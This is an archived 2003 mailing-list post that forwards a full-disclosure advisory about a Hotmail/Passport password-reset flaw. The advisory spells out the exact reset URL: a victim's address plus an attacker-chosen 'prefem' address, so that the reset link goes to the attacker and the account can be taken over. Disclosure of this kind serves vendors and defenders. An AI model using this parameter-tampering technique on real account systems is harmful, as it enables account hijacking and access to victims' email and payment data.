Complete.Org: Mailing Lists: Archives: discussion: May 2003:
[aclug-L] .NET security problem

To: kulua-l@xxxxxxxxx
Subject: [aclug-L] .NET security problem
From: Michael Osten <mosten@xxxxxxxxxxxx>
Date: 07 May 2003 23:01:56 -0500

This is almost to incredible to be real, but unfortunately is quite
real.  From the Netsys full disclosure list:

Hotmail & Passport (.NET Accounts) Vulnerability

There is a very serious and stupid vulnerability or badcoding in Hotmail
/ Passportʼs (.NET Accounts)

I tried sending emails several times to Hotmail / Passport contact
addresses, but always met with the NLP bots.

I guess I donʼt need to go in details of how cruical and important
Hotmail / Passportʼs .NET Account passport is to anyone.

You name it and they have it, E-Commerce, Credit Card processing,
Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and
what not.

It is so simple that it is funny.

All you got to do is hit the following in your browser:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@xxxxxxxxxxx&id=&cb=&prefem=attacker@xxxxxxxxxxxx&rst=1

And youʼll get an email on attacker@xxxxxxxxxxxx asking you to click on
a url something like this:

http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033

>From that url, you can reset the password and I donʼt think I need to
say anything more about it.

Vulnerability / Flaw discovered         :       12th April 2003
Vendor / Owner notified         :       Yes (as far as emailing them
more than 10 times is concerned)

Regards
--------
Muhammad Faisal Rauf Danka